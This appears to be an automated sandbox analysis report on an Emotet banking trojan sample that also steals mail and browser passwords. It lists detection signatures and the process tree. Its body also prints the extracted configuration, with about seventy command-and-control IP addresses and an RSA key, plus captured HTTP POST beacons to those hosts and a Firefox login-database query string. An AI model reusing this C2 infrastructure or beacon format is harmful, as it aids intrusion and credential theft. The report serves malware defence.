
Analysis Report SecuriteInfo.com.Trojan.DownLoader34.3377.7296.18555

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.DownLoader34.3377.7296.18555 (renamed file extension from 18555 to exe)
Analysis ID: 255752
MD5: d507bae53ba035ed150c7cb8766d91b1
SHA1: 16013d0b053a6f90cea7d4b504ebe79d7a51cab4
SHA256: e0b85beafe2d9458280b7d0b806c2f173738ff689e43fb2b5d5582943bd36a49

Detection

Emotet, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe (PID: 7068 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe' MD5: D507BAE53BA035ED150C7CB8766D91B1)
    • PlayToStatusProvider.exe (PID: 7116 cmdline: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe MD5: D507BAE53BA035ED150C7CB8766D91B1)
      • PlayToStatusProvider.exe (PID: 1640 cmdline: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' 'C:\Users\user\AppData\Local\Temp\7BFC.tmp' MD5: D507BAE53BA035ED150C7CB8766D91B1)
      • PlayToStatusProvider.exe (PID: 2108 cmdline: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp' MD5: D507BAE53BA035ED150C7CB8766D91B1)
      • PlayToStatusProvider.exe (PID: 5860 cmdline: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\85F1.tmp' MD5: D507BAE53BA035ED150C7CB8766D91B1)
      • PlayToStatusProvideroe.exe (PID: 6304 cmdline: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvideroe.exe' 'C:\Users\user\AppData\Local\Temp\7BFC.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 7140 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 64 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • SgrmBroker.exe (PID: 3652 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1276 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 64 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
  • svchost.exe (PID: 6264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 988 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["71.50.31.38:80", "185.94.252.13:443", "217.199.160.224:7080", "181.167.96.215:80", "111.67.12.221:8080", "68.183.170.114:8080", "212.71.237.140:8080", "83.169.21.32:7080", "190.6.193.152:8080", "217.13.106.14:8080", "181.31.211.181:80", "177.66.190.130:80", "192.241.146.84:8080", "80.249.176.206:80", "204.225.249.100:7080", "137.74.106.111:7080", "5.196.35.138:7080", "104.131.103.37:8080", "189.218.165.63:80", "170.81.48.2:80", "61.92.159.208:8080", "219.92.13.25:80", "2.47.112.152:80", "181.129.96.162:8080", "178.79.163.131:8080", "187.162.248.237:80", "46.28.111.142:7080", "212.231.60.98:80", "187.51.47.26:80", "187.106.41.99:80", "185.94.252.12:80", "94.176.234.118:443", "77.90.136.129:8080", "12.162.84.2:8080", "68.183.190.199:8080", "203.25.159.3:8080", "190.163.31.26:80", "46.214.11.172:80", "190.163.1.31:8080", "172.104.169.32:8080", "72.47.248.48:7080", "202.62.39.111:80", "157.7.199.53:8080", "181.30.69.50:80", "89.32.150.160:8080", "51.255.165.160:8080", "177.75.143.112:443", "104.236.161.64:8080", "177.144.135.2:80", "70.32.84.74:8080", "114.109.179.60:80", "190.181.235.46:80", "87.106.46.107:8080", "45.161.242.102:80", "104.131.41.185:8080", "50.28.51.143:8080", "190.194.242.254:443", "144.139.91.187:443", "192.241.143.52:8080", "82.196.15.205:8080", "77.55.211.77:8080", "190.17.195.202:80", "143.0.87.101:80", "181.120.79.227:80", "185.94.252.27:443", "177.72.13.80:80", "186.250.52.226:8080", "70.32.115.157:8080", "190.147.137.153:443", "149.62.173.247:8080", "177.139.131.143:443"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each entry)
0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmp | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000001.00000002.534389058.0000000002230000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000003.375062507.0000000003DC0000.00000040.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000001.00000003.372994628.0000000003510000.00000040.00000001.sdmp | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
(19 entries in total; the remaining entries are not shown here)

Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each entry)
13.2.PlayToStatusProvider.exe.400000.0.raw.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
1.2.PlayToStatusProvider.exe.3a90000.7.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
14.1.PlayToStatusProvider.exe.400000.0.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x131b0:$a1: logins.json
  • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x13934:$s4: \mozsqlite3.dll
  • 0x121a4:$s5: SMTP Password
14.1.PlayToStatusProvider.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
1.3.PlayToStatusProvider.exe.3510000.2.raw.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
(17 entries in total; the remaining entries are not shown here)

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Creation
  Source: Process started
  Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update)
  Data: Command: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp', CommandLine: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, NewProcessName: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, OriginalFileName: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, ParentCommandLine: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, ParentImage: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, ParentProcessId: 7116, ProcessCommandLine: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp', ProcessId: 2108

Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000002.534389058.0000000002230000.00000040.00000001.sdmp | Malware Configuration Extractor: Emotet (same configuration as listed under Malware Configuration above)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: 0_2_004426D8 lstrlenA,FindFirstFileA,FindClose,0_2_004426D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe | Code function: 0_2_00441080 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_00441080
Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 1_2_004426D8 lstrlenA,FindFirstFileA,FindClose,1_2_004426D8
Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 1_2_00441080 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00441080
Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_2_0040A1A7 FindFirstFileW,FindNextFileW,13_2_0040A1A7
Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 13_1_0040A1A7 FindFirstFileW,FindNextFileW,13_1_0040A1A7
Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe | Code function: 14_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,14_2_0040702D

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.6:49726 -> 71.50.31.38:80
Source: Traffic | Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.6:49733 -> 185.94.252.13:443
Source: global traffic | HTTP traffic detected:
  POST /ZT6nLHo1gxz3xY/JMImc9LOLC/Wr2SAdLb9Gj/Nt0ts0h/RsZMGsR9d/ HTTP/1.1
  Referer: http://185.94.252.13/ZT6nLHo1gxz3xY/JMImc9LOLC/Wr2SAdLb9Gj/Nt0ts0h/RsZMGsR9d/
  Content-Type: multipart/form-data; boundary=---------------------------143050135578680
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /vcigLch3RYnGuXu/pjpWi/ HTTP/1.1
  Referer: http://185.94.252.13/vcigLch3RYnGuXu/pjpWi/
  Content-Type: multipart/form-data; boundary=---------------------------550732082790994
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /HoQFbYzR/64Wufep/XgnG0SnoE1Etk/Z9vUPsIyi2hWcj836/5xJjcW1tPtnqa9/ HTTP/1.1
  Referer: http://185.94.252.13/HoQFbYzR/64Wufep/XgnG0SnoE1Etk/Z9vUPsIyi2hWcj836/5xJjcW1tPtnqa9/
  Content-Type: multipart/form-data; boundary=---------------------------355531102334046
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /9g7gFFV/NinW5U9mPGA0M/Bo6qnDoWpsmlH/fTLbJmHwPyJFH9Qve/ZKY6zL9FJ52LL/o0Cw35ZwbxJjgnag/ HTTP/1.1
  Referer: http://185.94.252.13/9g7gFFV/NinW5U9mPGA0M/Bo6qnDoWpsmlH/fTLbJmHwPyJFH9Qve/ZKY6zL9FJ52LL/o0Cw35ZwbxJjgnag/
  Content-Type: multipart/form-data; boundary=---------------------------963035908187561
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4628
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /bQMChyjVKpnynqgat1e/M2Ti0COZHgin/E6RDL0gQ3vdy8/hAPMeeivQqBzG6x5JO/ HTTP/1.1
  Referer: http://185.94.252.13/bQMChyjVKpnynqgat1e/M2Ti0COZHgin/E6RDL0gQ3vdy8/hAPMeeivQqBzG6x5JO/
  Content-Type: multipart/form-data; boundary=---------------------------525064889294057
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4628
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/ HTTP/1.1
  Referer: http://185.94.252.13/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/
  Content-Type: multipart/form-data; boundary=---------------------------849419803894004
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4628
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /J03oWp8HtqaUpdT4Ci/IvAn2Gl9W10Y7Wk/vCoQ0bbVqmAPaA1BFWG/ HTTP/1.1
  Referer: http://88.217.172.65/J03oWp8HtqaUpdT4Ci/IvAn2Gl9W10Y7Wk/vCoQ0bbVqmAPaA1BFWG/
  Content-Type: multipart/form-data; boundary=---------------------------382551960727294
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 88.217.172.65:443
  Content-Length: 4356
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 71.50.31.38 (3 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 185.94.252.13 (47 occurrences)
              Source: svchost.exe, 00000017.00000003.504930851.0000013EC0B6D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
              Source: svchost.exe, 00000017.00000003.504930851.0000013EC0B6D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
              Source: svchost.exe, 00000017.00000003.504998305.0000013EC0B7E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","S
R","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
              Source: svchost.exe, 00000017.00000003.504998305.0000013EC0B7E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","S
R","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
              Source: svchost.exe, 00000017.00000003.505052140.0000013EC0B1F000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","/m equals www.facebook.com (Facebook)
